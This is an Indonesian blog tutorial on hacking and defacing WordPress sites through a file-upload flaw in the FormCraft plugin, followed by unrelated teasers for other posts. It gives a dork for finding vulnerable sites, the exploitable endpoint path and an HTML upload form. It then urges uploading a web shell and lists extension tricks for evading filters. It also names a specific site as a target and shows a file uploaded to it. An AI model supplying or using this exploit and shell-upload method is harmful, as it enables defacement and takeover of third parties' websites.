Langsung ke konten utama

Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0

Hikigaya, Ayanokouji

Hack WordPress Dengan Memanfaatkan Bug Dari Plugin FromCraft 2.0 - Sesuai dengan judul postingan, kali ini saya akan memberikan tutorial untuk melakukan hacking atau deface sebuah website.

Target kita kali ini adalah situs yang menggunakan CMS WordPress, dan kita akan memanfaatkan kelamahan dari plugin FromCraft yang terinstall di situs target.

Dork : inurl:"/wp-content/plugins/formcraft/"
Exploit : /wp-content/plugins/formcraft/file-upload/server/content/upload.php
Target yang vuln akan memunculkan tulisan seperi ini : {"failed":"No file found 2"}


Silahkan dorking dulu untuk mencari target. Dork bisa kalian kembangkan sendiri biar lebih mantap.



Berikut ini adalah salah satu contoh target yang vuln.

http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Setelah mendapatkan target yang vuln, selanjutnya kita akan menggunakan CSRF untuk mengupload file kita.

***CSRF***
<form method="POST" action="[Alamat_Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Kemudian, simpan kode CSRF yang telah saya berikan dalam format html, dan jangan lupa untuk mengganti [Alamat_Target] sesuai dengan alamat dari target kita.

Untuk nama filenya terserah kamu, yang penting adalah format harus .html

Setelah itu, buka file CSRF yang telah kita buat tadi menggunakan web browser.


Sekarang pilih file yang ingin kamu upload, dan tekan Upload.

Jika muncul tulisan seperti pada gambar dibawah ini, berarti file kita telah berhasil tersimpan di website target.


Perlu diperhatikan, bahwa nama file yang kita upload akan berubah setelah diproses oleh server.

Dalam kasus ini, file yang saya upload bernama "arter.html" kemudian berubah nama menjadi "15d9606bedf01e---arter.html".

Sekarang kita tinggal mengakses file yang telah diupload tadi.


Direktori file kita : target/wp-content/plugins/formcraft/file-upload/server/content/files/nama_filekamu

Dan hasilnya akan seperti ini:

http://www.giien.com/wp-content/plugins/formcraft/file-upload/server/content/files/15d9606bedf01e---arter.html

Kalo kamu mau menebas index website, silahkan upload shell andalah kamu.

Jenis ekstensi yang didukung : namafile.html, namafile.php, namafile,jpg, namafile.gif.

Untuk upload shell, kamu bisa menyamarkannya dengan menggunakan namafile.php.jpg, namafile.php5, namafile.phtml, namafile.php;.gif, dan sebagainya. Silahkan gunakan otak kamu.

Btw, jika balasan dari website adalah {"failed":"Not writable"}, berarti bug di web itu telah diperbaiki.

Beberapa contoh target yang masih vuln:



Goodluck.

Postingan populer dari blog ini

Percantik Tampilan Linux Mint Dengan Tema Adapta Nokto

Kemarin saya menginstall linux mint dan hari ini saya memutuskan untuk mengubah tampilannya dengan menggunakan tema yang lain. Tema yang saya gunakan adalah Adapta Nokto. Itulah tampilan sistem operasi linux mint saya saat menggunakan tema adapta nokto. Untuk rinciannya bisa dilihat pada gambar berikut. Untuk cara menginstallnya mungkin akan saya tulis di postingan selanjutnya.
Lanjutkan membaca...

Cara Menyambungkan Hotshare HTTP Injector di Sistem Operasi Linux

Buat kalian yang belum tahu, HTTP Injector adalah salah satu aplikasi android yang bisa digunakan untuk mengakses internet secara gratis. Sebenarnya masih banyak fungsi lain dari aplikasi ini tetapi saya tidak akan membahasnya. Silahkan cari informasinya sendiri. Sedikit informasi, sebenarnya dari aplikasi HTTP Injector-nya sudah ada fitur untuk berbagi hotspot kita, tetapi cari ini hanya bisa digunakan untuk hp yang memiliki akses root. Karena beberapa alasan saya belum melakukan root untuk hp yang saya gunakan. Hal  ini merupakan suatu masalah karena jika kita mengaktifkan hotspot saat menggunakan HI pada perangkat yang belum di root, maka perangkat lain yang tersambung di hotspot kita tidak bisa ikut menikmati akses internet gratisnya. Untungnya, sang pembuat aplikasi ini telah menyediakan fitur Hotshare yang bisa memudahkan kita yang hpnya belum di root. Setelah di aktifkan, kita tinggal mengikuti tutorial yang ada. Sayangnya, di situs guide tersebut tidak ada tutorial untuk si...
Lanjutkan membaca...

Review Anime Gekkan Shoujo Nozaki-kun

Sore ini saya baru saja selesai menonton anime Gekkan Shoujo Nozaki-kun dan dalam postingan ini saya akan memberikan review dari anime tersebut. Sebelum lanjut, mari kita lihat dulu mengenai informasi anime ini. Gekkan Shoujo Nozaki-kun ( 月刊少女野崎くん ) atau dalam bahasa Inggris disebut Monthly Girls' Nozaki-kun adalah anime dengan genre komedi, romantis, dan sekolah yang dibuat oleh studio Doga Kobo pada musim panas (summer) tahun 2014. Sinopsis. Chiyo Sakura adalah seorang  gadis sekolah menengah yang ceria dan dia jatuh cinta kepada Umetarou Nozaki. Ketika Chiyo memutuskan untuk menyatakan perasaannya kepada Nozaki, Chiyo malah mendapatkan tanda tangannya. Ternyata Nozaki adalah seorang shoujo mangka yang disegani, yang menggunakan nama Sakiko Yumeno sebagai nama penanya. Karena serangkaian kesalahpahaman yang terjadi, menyebabkan Chiyo Sakura malah menjadi salah satu asistennya Nozaki. Dari sinilah cerita anime ini dimulai. Bagaimana kualitas dari anime ini? Kalau masalah kualita...
Lanjutkan membaca...